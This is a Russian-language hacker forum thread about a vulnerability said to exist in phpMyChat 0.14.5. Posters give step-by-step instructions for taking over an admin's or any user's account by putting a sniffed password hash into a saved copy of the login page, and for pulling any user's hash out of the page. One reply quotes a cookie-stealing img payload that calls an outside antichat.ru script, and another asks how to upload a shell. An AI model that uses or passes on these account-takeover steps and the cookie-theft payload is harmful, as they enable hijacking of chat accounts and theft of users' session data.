![]() |
уязвимость в phpMyChat 0.14.5
Привет! Я нашел уязвимость в phpMyChat 0.14.5 ,и более поздние версии (может ее и до меня нашли, но вроде я таких уязвимостей не встречал). Суть в том: можно изменить пасс админу (любому пользователю), можно зайти под него ником в чат.
Для этого надо знать его ник и хеш (хеш не надо расшифровывать). Допустим, мы узнали с помощью снифера хеш админа. Изменим ему пасс. Вот код страницы Код:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">В поле <INPUT TYPE="password" NAME="AUTH_PASSWORD" SIZE=11 MAXLENGTH=16 VALUE="" CLASS="ChatBox"> после слова VALUE пишем его хеш. Все сохраняем страницу в html и нажимаем "Войти" меняем пасс можно и ник и теперь мы админы. Если что-то не понятно пишите kalnin2006@yandex.ru или стучите в асю: 255553398. Извините если что не понятно это моя первая уязвимость!!! "The pirats of a network" www.pirats.jino-net.ru |
хе-х, в этом " phpMyChat 0.14.5 " стока баг, что можно книгу написать... года 2-3 назад друг написал пхп скрипт через которую можно было кикнуть админа, стать модером и тд=)
на сколько я помню на античате есть видео по той баге которую ты описал, но и хеш не всегда можно узнать.... |
Дитё-инвалид вернулся!!! Ура!!!
=)))))))))))))))))))))))))) |
Мне стали задавать вопрос: «Как узнать хеш админа, если он не появляется в чате?".
Узнать можно. И не только админа, а можно и любого модера или юзера. Вот код страницы: Код:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">В строчке <INPUT TYPE="password" NAME="AUTH_PASSWORD" SIZE=11 MAXLENGTH=16 VALUE="Lady_Ann" CLASS="ChatBox"> после VALUE= тоже пишем этот же ник. А не хеш. Нажимаем "Вход" и видим, ник и пас в виде звездочек. Теперь просматриваем страницу в HTML и ищем строчку <INPUT TYPE="password" NAME="AUTH_PASSWORD" SIZE=11 MAXLENGTH=16 VALUE="342353564asas34523523" CLASS="ChatBox"> Теперь уже после VALUE= будет не ник, а хеш пользователя. "The pirats of a network" www.pirats.jino-net.ru |
!!!!!!!!!!!!!!!хе-х, в этом " phpMyChat 0.14.5 " стока баг, что можно книгу написать... года 2-3 назад друг написал пхп скрипт через которую можно было кикнуть админа, стать модером и тд=)
на сколько я помню на античате есть видео по той баге которую ты описал, но и хеш не всегда можно узнать....!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! Здесь есть видеоно только не по этой баге.Видео о том, как вставлять в чате теги |
Давно уже эта уязвимость есть! Вот даже видео
http://video.antichat.ru/file71.html А так воруем куки Код HTML:
\x3cimg src="http\x3a//antichat.ru/cgi-bin/s.jpg" name="imaga"\x3e |
инвалид по-моему эта бага давно паблик и была найдена
|
А шел можно как нибудь залить ?
|
vot ya zaidy v chat i kyda mne vstavit etot Cod Stratichki?
|
| Время: 03:16 |